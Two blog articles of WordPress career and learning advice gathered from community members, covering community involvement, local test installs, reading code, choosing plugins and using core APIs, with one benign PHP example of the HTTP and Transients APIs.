
Learn, Build and Share: The WordPress Community Offers Advice To Beginners

We’ve all been total newbies. In fact, I spend most of my time still feeling like one. So researching this article was a great opportunity for me to do some more learning, and to share all of that good stuff with you.

I reached out to people from across the WordPress community to ask what advice they would give to people just starting their WordPress journey. I talked with developers, designers, support reps, security experts, hosting companies, theme shops, plugin developers and just about everything in between.

This article is a result of their insight, and I hope that it provides some encouragement and guidance to newbies — whether you’re a user or a developer — as well as some tips for advanced WordPress users who continue to learn throughout their lives. With that in mind: WordPress community, take it away!

Get Involved With The Community

WordPress has a tight community with active contributors from all over the world, so it’s no surprise that a bunch of people within that community recommended newbies start chatting with others. Having a desire to learn and get help will get you far. As Japh Thomson pointed out:

“There’s a lot to learn, and this is the best way to ensure you’re learning the right way to do things. It also means that as you learn, you can give back, which helps the community to grow. As you give back, you’ll find this actually helps you learn even more!

Being a part of the WordPress community is a mutually beneficial arrangement, and a fantastic way to build your skills and experience.”

There are plenty of places to get involved. If you’re a developer you could check out the weekly WordPress core developer chats on the #wordpress-dev channel on the freenode IRC (Internet Relay Chat) network. Just listening to what’s going on in the chat will help you to understand the direction of the codebase and the decisions that have been made. You’ll also learn who is doing the talking, i.e. who the project leaders are.

WordPress community members chatting at the WordPress community summit. (Image source: Andrea R)

When Brad Williams started out with WordPress, he just hung out in the #wordpress chat. Within a few months he went from asking questions to answering them, and made some new friends while he was at it.

If IRC isn’t for you, sign up for WordPress.org and use the Codex and the forums to start learning. While you’re there, you can help out by fixing any problems that you see in the Codex, or replying to support forum questions that you might know the answer to.

You can also follow WordPress people on Twitter, comment on blogs and go to WordCamps and Meetups. “Being a part of that conversation,” says Kailey Lampert, “is vital to anyone who wants to learn.”

Take the time to learn who is who in the WordPress community. As Remkus de Vries says:

“The most important thing is to check your surroundings. You can’t enter a community without knowing who the key players are and what the rules are. Learning that is also learning WordPress. No matter what you’d like to get out of the community, you have to be willing to put the time in there without expecting anything monetary in return. Think of it as earning your ‘street cred.’ The more you make yourself visible, and there’s lots of ways to do that, the better you’re helping yourself and the project.”

As a developer, you can get involved by open-sourcing your software and distributing it. This could involve writing a plugin or a theme and putting it on the WordPress repository or GitHub. “Not only will you gain the respect of other developers and community members, you’ll learn so much about what it means to be part of the WordPress community,” says Drew Strojny. “You’ll get feedback and ideas to help improve whatever you built or contributed and you’ll likely learn something along the way.”

Simon Wheatley pointed out that there is space for everyone in the WordPress community:

“If you are a developer, look out for places you can start to get involved in code contributions to plugins or to core WordPress. If you are a business person or you are using WordPress, look for opportunities to get involved in local events and meet other users. The more contact you have with the community, the better your experience will be. WordPress is written by people who see something they want to improve and get involved with the code, WordCamps and meet ups are organized by people who see a gap and get involved in helping improve the community, documentation is written by people who don’t understand something and get involved in creating explanations… getting the idea? Get involved!”

The other great thing about getting involved is that you’ll make friends and create a support network, which means if things do go wrong in the future, there’ll be people around who can help you out.

Thanks for input from: Japheth Thomson, Mason James, Eric Mann, Kailey Lampert, Dre Armeda, Ronnie Burt, Simon Wheatley, Jared Atchison, Brad Williams and Remkus de Vries.

Learn

By far, the most common advice that I was given for beginners was based around learning. This encompasses everything from setting up your first WordPress website to starting out with developing for WordPress. Learning is your first step to becoming a pro in WordPress, whatever your area.

Ben Balter points out that WordPress has its own way of doing things:

“There’s the computer-sciencey way (formal MVC, elegance on paper), and then there’s the WordPress way (think actions/filters, the loop). It’s a lot more intuitive in many ways, but if you’ve been trained the wrong way, it could take a minute or two to unlearn. WordPress purposely breaks certain formal design patterns, and almost always walks away with a solution that is more elegant for the user AND the developer.”

If you’re a developer coming to WordPress for the first time, you might wonder why WordPress does things in such a WordPressy way. Once you dig deeper you will start to find it enjoyable!

Learn
Image source: opensourceway.

And if you’re coming to WordPress for the first time to build yourself a website, Jan Dembowski has this great advice:

“Don’t be intimidated. Once you have gotten your own installation of WordPress software running, understand that the magic happens via the PHP files and possibly mod_rewrite’s .htaccess rules.

Everything hitting a WordPress installation starts with a Web request, gets processed and data gets pulled from or inserted into the database. Poof! The Web page is generated. All you had to do was sign in, publish a post and suddenly you’re publishing on the internet.

If you don’t know how it all works that can be intimidating especially if something is not working the way you thought it would.”

Don’t be Afraid to Experiment

“One of the best ways to get familiar with a new product is to tinker,” says Collis Ta’eed. Sometimes the best way to learn is to take stuff apart and put it back together, to break things and to be forced to fix them.

You should take Andrea Rennick’s advice to both users and developers to “be fearless!” Even if everything goes totally wrong, you can install a new copy of WordPress and start again.

Or, as Helen Hou-Sandi says:

“Be curious about what’s out there and don’t be afraid to figure it out for yourself. Whether that means figuring out how to get a test or playground site up and running somewhere so you can try out themes and plugins without worrying about your live site, or actually reading through the code of some of those themes and plugins to see how it’s done (or shouldn’t be done), don’t get stuck in ruts or consider the first thing you read to be gospel. It’s kind of like saying ‘do your research,’ but think of it more as encouraging curiosity rather than doing homework. In the long run, you’ll know more, and who knows — maybe you can even help somebody out who’s now in your former shoes!”

If you want to truly get rid of your inhibitions, learn how to install a local development environment. Michael Krapf suggests that your first WordPress website should be a testing playground. There are plenty of tools out there that you can use to get set up. Try out installing WordPress with MAMP on your Mac or with XAMPP on Windows. Kurt Payne recommends trying out ServerPress Desktop Server.

Don’t be afraid to experiment! (Image source: opensourceway)

Add content to your website and manipulate it. Try out themes and plugins. If you’re a developer you can create themes and plugins. You’ll be able to take your time troubleshooting without worrying about having taken your website down.

If you’re starting out in development, Pippin Williamson has this advice:

“Just build something. Too many beginning developers get caught up with trying to make sure they do it right the first time, but that isn’t that important when you first start. Everyone makes mistakes, and you learn a heck of a lot faster from your mistakes than you do from attempting to learn how to do it perfect the first time.”

Remember that the scope of things that people do with WordPress is changing. Jake Goldman points out that the 2012 WordPress survey highlighted the content management system (CMS) as the most dominant use case, but that WordPress as an “app engine” is the greatest area of growth. “Other tools might offer a better fit,” he says, “but I’ll guarantee WordPress is a capable contender. Frame the way you think about WordPress in the context of a rich ‘framework’ for building great Web applications with an out-of-the-box CMS configuration, take the time to really understand its architecture, and challenge yourself to apply WordPress to challenges way outside of the box. You’ll open up a whole new world.”

Thanks for input from: Pippin Williamson, Collis Ta’eed, Marko Heijnen, Andrea Rennick, Paul Hughes, Andy Stratton, Helen Hou-Sandi, Michael Krapf and Kurt Payne.

Read

The internet has so much information out there that it can be difficult to know where to start looking. A great place is WordPress.org. Both the forums and the Codex are great resources for learning and understanding how WordPress works. Catia Kitahara started using WordPress after a recommendation from someone on a mailing list. The first place she looked for help was the Codex. Before you start asking questions of people, have a look in the Codex and the forums to see if there is already a solution.

And there is plenty of advice outside of the Codex. The internet is full of WordPress tutorials that will help you to achieve your goals. A word of caution though: If you find a tutorial or code snippet, check the date of the post. WordPress has a fast release cycle, and a lot changes over the years. The post may still be entirely legitimate, but some will be out-of-date and may cause you confusion.

As a documentation writer, I know how little people actually read the things I write, and if the documentation actually got read people would find themselves in much less trouble. I’m not the only person aware of this.

As Joshua Strebel says:

“The old joke that people don’t read, and that they read instructions even less, is as true as it has ever been. You can do your part and make the WordPress world a better place by becoming a savvy user that wants to understand and learn versus the type that refuses to think and just wants things done for them.

We have found in our business that encouraging and guiding the customer to digest the support information we have provided and educating them on not just the How but also the Why, leads to a more satisfied and happy user. Once the unknown becomes known, everyone is happier.”

Thanks for input from: Eric Mann, Joshua Strebel, Slobodan Manic and Cátia Kitahara.

Write

You learn best when you are explaining what you do to other people. It’s a well-worn saying, but true nevertheless. You may have lots of knowledge on a specific subject, but can you break it down and explain it to other people? Once you’ve done that, you know that you’ve really got a grasp on it yourself.

The first place you could start writing is on your blog. If you’ve discovered a solution to a WordPress problem, write about it and share it with the world. This way you’re helping out people who have the same problem. It’s also a great thing that a blog has a feedback loop. If you’ve got something wrong, or if there is a better way to do it, someone will tell you.

Different ways to get there
Try out different ways to reach your goal. (Image source: opensourceway)

Brad Williams knows all about it:

“Some of my earlier WordPress posts were a big help to others and some were actually incorrect. What I learned from this is other WordPress developers would read my posts and correct any mistakes I might have made in my code samples. This actually made me more comfortable with releasing my code to the public because I realized the WordPress community ultimately just wants to help, not make fun of small coding mistakes.”

This is my own experience as well. Of course, if you get something wrong there may be people who get snarky with you, but largely the WordPress community wants to help you to improve. Good content on blogs benefits the entire community.

Once you’re comfortable with writing on your blog, why not try writing on the WordPress Codex. This is another place where you can test to see if you can make your ideas as clear in writing as they are in your head.

Thanks for input from: Brad Williams and me.

Learn the Basics

When it comes to theme development, Andy Stratton points out that he learned on default themes such as Classic and Kubrick, which were much simpler than the latest default — Twenty Twelve. Twenty Twelve shows off WordPress beautifully but it’s not the most useful tool for absolute beginners. Look for simpler themes to learn from, and learn by working through simple tasks. Here are some things Stratton suggests you try:

  • Create a theme that lists blog posts and has a single post template and a page template;
  • Implement comments on a single post template;
  • Implement a custom output for comments;
  • Implement date, category and tag archives;
  • Implement a widgetized sidebar;
  • Create a custom widget;
  • Create a child theme that does nothing;
  • Create a child theme that changes how single posts are displayed.

“Tackling these challenges individually is similar to project management techniques of splitting larger tasks into more manageable pieces. You will learn more and start to relate how these things fit together. Eventually, you would have mind-mapped most of the template and theming structure for WordPress.”

Thanks for input from: Andy Stratton.

Read the Code

If you’re a developer, you shouldn’t just be looking at the Codex or online tutorials. These will get you started but they won’t provide you with everything you need to become an expert developer.

Alex King points out that “the documentation says what the code is supposed to do, while the code says what it actually does.” Documentation can lag behind the code, especially when core patches are merged. And while you’re poking around in the code, you may find other things that are immediately helpful and that you can file away for the future.

Read the Code
Image source: opensourceway.

When Konstantin Obenland started out with WordPress, he started out by looking at the code. He opened files and read them. This gave him an idea of what functions were available, how the APIs work and what was going on internally.

“The biggest challenge for me was to get an idea of where actions and filters were available and how I could alter behavior. Since they are what we work with to tweak core, I would encourage developers new to WordPress to grasp the concept of actions and filters and learn about which one to use in a given context.”

Thanks for input from: Alex King and Konstantin Obenland.

Other ways to learn

Other people had suggestions of different ways to learn:

  • Stratton suggests that you get paid to learn by taking on new freelance projects that offer a little bit of new stuff for you to learn. Tell your client that it may take you a little longer and that it will require a learning curve. By the end of the project you’ll have been paid for a good job done, and you’ll have acquired a new skill.
  • When he started to develop themes, Magnus Jepson learned by customizing free themes he liked instead of building from scratch. “I had basic knowledge of CSS/HTML and PHP before, but by looking at how other themes worked I gained knowledge and was able to build my first custom theme for a client.”
  • Ryan Duff reminds you that “you also need to be receptive to comments and criticism. Talking to others online, whether it is in forums, IRC, etc… That networking and learning will allow you to discover early on the who, what, when, where and why of WordPress.”

Build

It’s great to learn, but it’s also fun to build. If you want your WordPress website to be sustainable and secure, it’s worth putting some planning and thought into what you’re going to do. If you’re building your first WordPress website, think about the design and the functionality that you want. If you’re a developer, take some time to actually understand what it is that you’re doing.

Here’s some advice from Mike Little:

“It is so easy to search the Web and find some code to copy into functions.php that’s supposed to do what you were looking for. But if you don’t understand it, you won’t be able to fix it if it doesn’t quite work, or change it to make it work differently. Equally importantly, you will eventually learn to spot bad code from good, and there is a lot of bad code out there in the wild that unfortunately finds its way into people’s websites. I include in that statement code that used to be good code, but is now old and out-of-date. I see a lot of code implementing some functionality that got incorporated into core WordPress aeons ago (that’s at least a year in Internet Time).”

If you’re a user or developer, a little bit of understanding goes a very long way. Planning your website and taking things slowly will help you to learn and understand along the way. With that in mind, here’s some advice for building your website.

Take Things Slowly

When you’re building your first website, don’t just rush in and think you can master everything at once. “Starting a new blog can quickly become overwhelming,” says Rachel Baker. “Don’t try to master theme design, plugin development, SEO, community building and writing viral content before you even begin writing your first blog post. Set small achievable goals to stay focused and keep up momentum.”

Learn to go slowly.

Just because there are lots of different things that you can do with your blog doesn’t mean that you need to do them. Amy Hendrix suggests that you have a plan for what you want your website to be and design what you’re going to use based on that plan.

“There are a zillion themes and plugins for WordPress that can add all sorts of shiny widgets, gizmos and gadgets to your site,” says Dougal Campbell. “Your first priority is to make sure that your site is easy for your readers to use — if you add too much clutter it can detract from your message.”

Remember that your website is for delivering a message and you should always keep your audience in mind.

That said, you should plan to go big, suggests Mika Epstein:

“You start small, with a good foundation and make it solid. Build your site with thought. ‘If I use ugly permalinks now, what happens if I want to change it later?’ You can’t know the future, but you can make reasonable assumptions. Make a hard list of your needs and your wants and be absolutely brutal with yourself. You know the difference between a need (gas for the car) and a want (a new car, when yours runs just fine).”

Thanks for input from: Mika Epstein, Rachel Baker, Amy Hendrix and Dougal Campbell.

Choose your plugins and themes wisely

When you start out with WordPress, it is very easy to think “OMG IT’S FREE!” and then get overexcited by all of the free plugins and themes out there. It’s important to keep in mind that just because something is free, it doesn’t mean that it’s good. And equally important within WordPress is that just because something is commercial, that doesn’t mean it’s good either. There are plenty of powerful, secure, free WordPress themes and plugins, and plenty of poor quality commercial themes and plugins. Learn to distinguish between them.

“Don’t install crappy themes and plugins,” says Rarst. “If you are not confident to know which are good — don’t rush to install any straight away or get someone to help you with choosing.”

You should avoid using Google to search for free plugins and themes, and certainly avoid any torrent/warez websites offering commercial themes and plugins for free. Get what you need from reputable plugin and theme shops. Emil Uzlec notes that the ratings system in the WordPress repositories makes it much easier for you to make a choice about what you’re installing on your website.

Both Andrew Norcross and Mark Jaquith suggest that you put some thought into your selection of plugins. Norcross suggests that you focus on what you’re trying to achieve and then find the right tools to achieve that. A clear idea of what you need helps to sift through all of the tools out there.

And, as Jaquith points out, what you need could actually be in core. “Don’t go crazy and add every one you see that you think might be useful,” he says. “Get to know the core software first before you add a bunch of stuff.”

Thanks for input from: Rarst, Andrew Norcross, Mark Jaquith, Emil Uzlec and Sinisa Komlenic.

Know Your WordPress

WordPress and WordPress.com are two different things. Cristi Burcu suggests that you learn the difference between WordPress.org and WordPress.com so that you can decide which one is right for you. In brief:

  • WordPress is an open-source content management system for building and hosting a website on a Web server.
  • WordPress.com is a network of blogs that runs on that software.

They are two different entities. If all you want is a blog and aren’t interested in setting up and controlling your own website, then it’s worth checking out WordPress.com.

“It’s free,” says Chris Wallace, “and you don’t need to understand any of the technology behind it. In just five minutes, you can be up and running with a shiny new website which has loads of bells and whistles.”

If you want more than a blog, or you want more control, you can use WordPress, the software. When you install the software, you can install any plugins and themes that you want, and have much more control over your website. Plenty of hosts offer one-click installs of WordPress. You can sign up for hosting, click a button and WordPress will be installed via a script. Or, you can sign up for a managed WordPress host like Page.ly, ZippyKid or WP Engine, which come pre-installed with WordPress and specialize in WordPress hosting.

Vid Luther quotes Andrew Spittle, who said “don’t pay less than a shrimp dinner for hosting.”

Thanks for input from: Silviu-Cristian Burcă, Chris Wallace, Vid Luther and me.

Don’t Reinvent The Wheel

Whether you’re building your own themes, starting to build for clients, writing custom functionality or coding plugins, remember that there is a lot of code out there and, since we’re in the WordPress ecosystem, it’s all open source. A great time to start thinking about building upon someone else’s code is when you are building themes.

Christine Rondeau notes that “there are tons of starter themes out there from super stripped down to others full with custom options.” Find one that suits your needs and learn it inside out. This will make it much faster for you to code websites.

A sculpture of a head with a wheel inserted in the brain.
(Image source: Zen Sutherland)

This advice filters into any aspect of development. Timothy Wood recommends looking for things that have already been done and finding ways to improve on them.

“The community is full of solutions that are not completed; it is the iterations that improve the solution to be extensible. I believe part of WordPress’s weakness is that a hack is considered a solution because the end goal is the visual or deliverable for implementation. Often the (give back to) community is overlooked in favor of hacking to just get it done.”

By working with other people’s code, instead of in a vacuum, you can help them to improve and give back to the community.

Thanks for input from: Christine Rondeau and Timothy Wood.

Ask For Help

Everyone needs a little bit of help from time to time, and there’s no shame in asking for it.

“There’s no such thing as a dumb question. Those of us who have been around a long time have pretty much seen all the questions people ask. We really would be happy to point you in the right direction. Don’t be scared, most of us do not bite.”

That’s from Andrea Rennick, who you’ll often find helping out on the WordPress.org support forums.

As well as the support forums, Syed Balkhi suggests trying WordPress Stack Exchange and Quora. He does mention, however, that these places are staffed by volunteers. People don’t get paid for their time so be nice and polite. Take the time to research your question beforehand. The volunteers will appreciate that you’ve taken the time to do so, and you’ll have a better experience overall. Just landing on a support forum and saying that your website is broken doesn’t help anyone.

And remember, once you’ve gotten help from other people, you can help out by answering questions from others. As Mario Peshev says, “doing support is one of the smoothest ways to gain know-how in a platform and be aware of the common questions and problems.”

Thanks for input from: Andrea Rennick, Mario Peshev and Syed Balkhi.

Find a Mentor

Frederick Townes says that starting a business in open source requires passion for solving a specific problem. He suggests that:

“Early on, make sure you identify mentors that can help you with various aspects of your business as it develops: secure and scalable code, marketing strategy, customer development and support, etc. Be transparent, communities and companies are made up of people, offline relationships make all the difference in not only understanding customer / community needs, but it’s also essential to keep things simple and master the art of creating value.”

Teach/Learn
Image source: opensourceway.

Finding a mentor will help you to feel less like you’re out on your own, and there’ll be someone there who can provide you with advice, whether that’s on the business or technical side of your business.

Thanks for input from: Frederick Townes.

Make Use Of The APIs

WordPress has a bunch of APIs built to make your life easier. Ryan Hellyer suggests that programmers avoid writing unneeded code logic as much as possible. WordPress has many ways of handling the internal logic and those who don’t use the APIs often end up doing things incorrectly.

Konstantin Kovshenin gets into detail about how the APIs offer easy solutions:

“There’s a lot of code in WordPress that is designed to make your life easier. Don’t use cURL or file_get_contents, there’s the HTTP API (wp_remote_* functions). Don’t design your own jobs system, there’s WP_Cron. Don’t do AJAX requests to your PHP files and include wp-load.php, there’s a lot of great stuff to deal with remote requests. Don’t write your own rewrites engine, there’s the powerful WP_Rewrite API. Other APIs to learn: WP_Query, Options API, Transients API, Shortcodes API, (my favorite) Settings API, Caching APIs and the new Customizer and Media APIs.”

WordPress has a lot going on for you to make use of, so it’s crazy to start writing things for yourself before checking out what it has to offer. And as Aaron Campbell says, “reinventing the wheel is not only a waste of time, but more likely to break in the future.”
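As an added illustration of Kovshenin’s first two points (this is example code written for this article, not code from him or from WordPress itself), here is a hand-rolled remote fetch next to the same fetch done through the HTTP API and cached with the Transients API. The endpoint URL and the transient name are made-up placeholders, and the code assumes it runs inside a loaded WordPress plugin or theme.

```php
<?php
// Added example, not from the article. Assumes WordPress is loaded (so
// wp_remote_get(), get_transient() and friends exist). The URL and the
// transient key are placeholders chosen for this example.

/**
 * The do-it-yourself version the quote warns against. file_get_contents()
 * gives no timeout control, returns a bare false on any failure, bypasses the
 * HTTP API's filters and proxy settings, and emits a PHP warning instead of an
 * error object you can inspect.
 */
function example_fetch_status_by_hand() {
    $body = @file_get_contents( 'https://example.invalid/status.json' );
    if ( false === $body ) {
        return array();
    }
    $data = json_decode( $body, true );
    return is_array( $data ) ? $data : array();
}

/**
 * The same fetch through the WordPress HTTP API, with the decoded response
 * cached in a transient so the remote host is contacted at most once an hour.
 */
function example_fetch_status_with_apis() {
    $cache_key = 'example_remote_status'; // placeholder transient name
    $cached    = get_transient( $cache_key );
    if ( false !== $cached ) {
        return $cached; // cache hit: no network request at all
    }

    $response = wp_remote_get(
        'https://example.invalid/status.json',
        array(
            'timeout'   => 5,    // seconds; a slow remote must not hang page loads
            'sslverify' => true, // certificate verification stays on (the default)
        )
    );

    // Transport failures (DNS, timeout, TLS) come back as a WP_Error object,
    // not as false, so check for it before touching the body.
    if ( is_wp_error( $response ) ) {
        error_log( 'status fetch failed: ' . $response->get_error_message() );
        return array();
    }

    // Only a 200 response is worth caching; anything else is treated as empty.
    if ( 200 !== (int) wp_remote_retrieve_response_code( $response ) ) {
        return array();
    }

    $data = json_decode( wp_remote_retrieve_body( $response ), true );
    if ( ! is_array( $data ) ) {
        return array(); // malformed JSON: do not put it in the cache
    }

    set_transient( $cache_key, $data, HOUR_IN_SECONDS );
    return $data;
}
```

The second function is the shape you get for free by using the APIs: timeouts, TLS verification, an error object to log, and caching, all without writing any of that logic yourself.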

Thanks for input from: Konstantin Kovshenin, Ryan Hellyer and Aaron Campbell.

Find A Focus

Finding a focus is great advice for anyone who’s out to get work or make a career in the WordPress ecosystem. While there is a lot of work around, the people who do really well are those who find their niche and dominate it.

Boone Gorges points out that this could be a specific market, such as verticals like music or restaurant journalism, or a technical focus on a specific aspect of WordPress — BuddyPress, Multisite or a specific framework. He says:

“Specialization has lots of benefits. You get to know your part of the codebase, making it faster to do new and interesting things. Getting your work done faster means making more money. Expertise leads to a better reputation, and reputations are easier to earn in a niche market. The better your reputation, the more you can charge. And if your focus is on one of the non-commercial parts of the WP ecosystem, like bbPress or BuddyPress, your expertise will make it possible to get involved in the free software project in ways that might be easier than cracking into WordPress core.”

This type of focus doesn’t apply only to developers. Tammie Lister is right when she says that the “WordPress world would suffer if we were all developers.” Find the thing that you’re good at and specialize in that area — the WordPress room has plenty of space for designers, writers, support pros, entrepreneurs, business people and all the other types who make up the WordPress ecosystem.

Thanks for input from: Boone Gorges and Tammie Lister.

Go To Events

WordCamps and Meetups, or any sort of WordPress event, are a great way to learn more about WordPress. WordCamps are normally large one- or two-day conferences, sometimes followed by a “hack day” or “dev day” during which developers get together to work on WordPress. They usually have some sort of social element where you can learn more about your WordPress peers.

Dozens of tires lined up on the ground, with people in the background.
(Image source: Stefano Coviello)

Meetups are smaller events. They are usually more regular, lasting a few hours with one or two speakers. While WordCamps often have people from all over a country, Meetups are usually focused on a specific local area. You can learn about WordCamps on WordCamp Central, or find some Meetups on Meetup.com.

Brad Williams recommends that developers go to events to meet other developers — he promises that they don’t bite (I will hold him to this promise).

Kim Gjerstad suggests that you find some people to have a beer with:

“It’s good to go out and meet other people and ask their opinion so if you can find a WordCamp or find a WordPress beer after hours, go out and meet people and talk to them. It’s a whole other level of learning when you meet people, and there is so much advice to be given.”

Thanks for input from: Kim Gjerstad and Brad Williams.

Final Words Of Wisdom

  • If you want to read just one website for tips to get started with your blog, Paul Gibbs recommends reading WordPress.com’s Get Focused page.
  • Seisuke Kuraishi says you should keep WordPress updated, as “this is the easiest way to keep your website secure and bug free.”
  • If you’re a blogger, Eric Mann suggests that you reach out. “Blogging is never done in a vacuum.” Comment on other people’s blogs, respond to comments on your own and interact with the community.
  • Another one for bloggers, this time from Vid Luther. Focus on your content. “People come to your website to read and consume what you have to say, interesting content is key. Anything else is bike shedding.”
  • If you’re starting a WordPress business, start it based on something that you need, says Vladimir Prelovac. “For example a certain plugin functionality, theme niche or a specific service. This way, even if the business does not take off, you will at least satisfy your own need by building it.”

Conclusion

I want to finish this article with some excellent advice from Isaac Keyet. Isaac is the Mobile Group representative at WordPress.org. His advice is applicable to anyone:

“Just jump in. If you have an idea for a great blog or website, set something basic up quickly (there are good free or cheap WordPress hosts out there) and start writing. As you go, you’ll learn more about what works and what doesn’t, as well as what your readers like the most. There really is no time like now, and too many great ideas never see the light of day because their inventor didn’t take that first step.”

Jump in, get started, don’t be afraid and always feel that you can ask for help. The WordPress community is a pretty welcoming place. Find some of the people mentioned in this article and follow them on Twitter; they continue to come up with WordPress advice that you’ll be able to use as you continue your WordPress learning experience.

Hang out in the WordPress chat room, help out on the support forums, go to WordCamps and Meetups. Everyone starts out as a beginner, but with WordPress it’s easy to get far. All you need is a little bit of patience, commitment and enthusiasm. Eventually you’ll be the one offering the advice.

Got any advice of your own? Let us know in the comments!



© Siobhan McKeown for Smashing Magazine, 2013.


Passion For Excellence: How To Become A Top WordPress Professional


  

“First, let’s set a few things straight: becoming a top WordPress [developer professional] is hard work — very hard work. It’s going to take a lot of time, energy and determination. If you’re looking for an easy checklist or some “fast pass” to the top, you’re going to waste your time. Being one of the best is hard, and statistically speaking, the odds are stacked against you.”

If you’re a regular reader of Smashing Magazine, that will no doubt sound familiar to you. A few weeks back, Jonathan Wold wrote a post on how to be a top WordPress developer. But development isn’t the only way to get ahead in WordPress, because one of the great things about it is that you don’t need to be a developer or an expert. You just need a passion for WordPress, for open-source software and for being part of a community.

How To Become A Top WordPress Professional
Image Credit: @cdharrison

In this article, I’m going to take a look at how you can be a top WordPress professional — this advice could apply to developers, but equally to bloggers, support reps, designers and everyone in between.

But why bother with WordPress in the first place? Cory Miller is the co-founder of iThemes, which offers professional WordPress themes, plugins and Web design training. He’s also the co-author of the latest edition of WordPress for Dummies. Miller started a blog with WordPress in 2006, as a total newbie with no WordPress experience, who started to learn by releasing free themes to the community. I asked him why people should get involved with WordPress.

“With WordPress you’re not sleeping on someone else’s couch. It’s open-source software that you control. You can do whatever you want with it, whenever you want. You’re not reliant on someone else’s stupid terms of services changes, or that you can’t touch the code because it’s locked away on someone else’s servers. I think we take for granted that freedom too often, or maybe forget it when the next [insert hot social media platform] rises up.

But the biggest reason for being involved with WordPress is it just makes Web publishing easy. Virtually anyone can have a blog or website on the Web with WordPress. And that opens up some amazing opportunities for everyone involved.”

WordPress makes it easy for people to publish a blog or website; it democratizes Web publishing. And its ease of use also makes it possible for people who aren’t PHP geniuses to make it to the top.

Why Be A Top WordPress Professional?

The sky is the limit with WordPress. (Image: stefanorugolo)

Being average and normal is underrated. You can’t be the best at everything, and if you spend your life trying to be, you could end up with a horrible neurosis. Besides, it can be nice to be just okay at something and accept that you’re okay at it — those things tend to have less stress associated with them. That said, it can be satisfying to strive to be better at the things that you’re passionate about, and whether that’s WordPress itself or the idea of taking control of your own destiny and running your own business, aiming for the top has a bunch of fringe benefits. For instance, the top WordPress professionals:

  • Make the most money
    If you want to make the most money, you need to be the best at what you do, whether that’s writing, training, supporting, launching startups or project management. If you’re good, your reputation will grow and you’ll be able to get higher rates. Check out this eBook from Code Poet with advice from top WordPress professionals on getting your pricing right.
  • Get the best clients
    As Wold pointed out in his article, once you get to the top you have a lot more freedom about what you say “yes” to. I’d like to add that as your rates start increasing, you’ll find that clients are increasingly easy to deal with. Charging more = better clients.
  • Have the most influence
    If you’re passionate about open-source software and WordPress itself, building your reputation means more opportunity to have influence.
  • Be part of a community
    The WordPress community is huge and growing. By taking part in that community and building a reputation for what you do, you’ll make connections with other people who are passionate about WordPress and who are at the top of their game. You don’t need to be the best developer to make it in WordPress, but it helps to make connections with them.
  • Make the right connections
    If you build your reputation in the WordPress community by contributing back, going to WordCamps and Meetups and generally getting involved, people will start to take notice of who you are. Once you’re on a person’s radar, work will be sent your way.

I’m Not A Developer! What Can I Do?

You do not need to know how to write code to get ahead in WordPress. If the only people involved in WordPress were developers, then WordPress wouldn’t be the software that it is today. Here are some of the things you can do:

  • Designer
  • Project Manager
  • Entrepreneur
  • Support Pro
  • Consultant
  • Blogger
  • Documentation Writer
  • Teaching & Training

If you aren’t convinced that you can make it doing these things, check out my post on the WordPress Economy to scope out some of the people who are already doing it.

A great example of this is Mika Epstein (more commonly known as Ipstenu). For her, WordPress started out as a hobby but it quickly became more rewarding than her IT job at a bank where she did everything from application installs on desktops to deployment automation and monitoring for servers. Recently, though, she’s started a job as a support specialist for DreamHost.

Epstein is also the support representative for WordPress, leading up the support and documentation teams on WordPress.org. This has involved talking to hosting companies and theme/plugin shops about what is expected from them on the support forums. She’s responsible for the Supporting Everything WordPress blog, wrangling people into editing, helping out and supporting other supporters.

Epstein is just one of the people who I’ll be talking to who are at the top of the WordPress game but who wouldn’t be simply categorized as a developer.

Starting Out

To be a top WordPress professional, you don’t need to be able to write PHP, know how to query a MySQL database or know how to schedule a cron job. The WordPress ecosystem is vast, and there is room for lots of different specialties. However, if you are going to be a top WordPress professional, you should at least know how WordPress works, have a good imagination and become an expert in some area of it.

Use WordPress

It may seem self-evident, but using WordPress for yourself is a great place to start. This could be publishing your own personal blog or building a website for a friend or family member. Find a way to use WordPress. It’s a little crazy to start out deciding you want to get to the top of something when you’ve never experienced that product from the perspective of the user.

“You’re involved with WordPress the minute you use it for yourself. That’s the beauty of open-source software and community. Your initiation into it is your ‘Hello World!’ or your first website and blog post with it.

So just start blogging and fall in love with it like I did 7 years ago.”

- Cory Miller

Install WordPress Locally

Use MAMP to install WordPress on your computer.

You don’t need to be a developer to set up a development environment on your computer. It may seem daunting. I remember that the first time I set up XAMPP with WordPress, I was totally confused and had no idea what I was doing. I muddled through it eventually and was amazed that it was something I could do. Now I have more local WordPress installations than I can keep track of. Installing WordPress on your computer means you can do whatever you want with it, without having to worry about a live server. You can break it, hack themes and plugins, install whatever you want and you don’t need to worry about domain names, production websites, etc. I run local installations for specific plugins such as bbPress and BuddyPress, which allows me to explore working on websites in different contexts. Once you’ve installed WordPress a few times on your computer, you’ll realize how remarkably simple it is. Tutorials: install WordPress using XAMPP (Windows) or MAMP (Mac).

Follow the Blogs

There are a plethora of WordPress blogs out there that you can learn from. Add them to your RSS reader and stay up-to-date. With so many blogs that have “WP” as a prefix, it may seem like they all have the same thing to offer, but the best are distinctive and each offers something unique. Here are some of my favorites:

  • Smashing Magazine (WordPress Category)
    Long form articles, tutorials and editorials
  • WP Realm
    International WordPress news, opinion and articles from experts across the community (and edited by me!)
  • WPCandy
    WordPress news and podcasts. There’s also a Pros section which you can sign up for once you’re a Pro!
  • WPBeginner
    WordPress tutorials, how-tos, videos and reviews, along with a nice coupon section for getting discounts on WordPress-related products and services.
  • WPMU.org
    Daily tips, tutorials and WordPress news.
  • WPLift
    Regular round-ups of WordPress plugins and themes, as well as the occasional tutorial.
  • Code Poet
    Interviews with prominent WordPress experts, short and useful eBooks and links to useful resources.

It’s also worth signing up for wpMail.me which is a weekly email with WordPress articles from across the community.

Be Enthusiastic

A little bit of enthusiasm goes a long way. Mason James started out applying for a job as a WordPress developer at WPMU DEV, but he did a terrible job at the plugin modification task they gave him, and he was turned down for the job. However, they so appreciated his communication skills and positive attitude that they took him on as a supporter.

“Regardless of the industry, people want to work with someone they enjoy being around. Having a positive attitude and being willing to tackle challenges are both qualities any company is going to be looking for. I’m also passionate about supporting websites and seeing any problems resolved. I’m a natural problems solver — it’s like a game to me, so that fits in quite nicely.”

His enthusiasm has taken him a long way, and now Mason is CEO of his own WordPress support, management and project management agency, WP Valet.

Listen

It’s approaching 10 years since WordPress was born. That means that there are a lot of people in the WordPress community with lots of experience. There are people with experience running startups, managing support forums, building plugins or theme shops or contributing to WordPress itself. Find these people and listen to what they have to say. Dougal Campbell curates a Twitter list called WPLeaders, which is a great place to find people with WordPress experience.

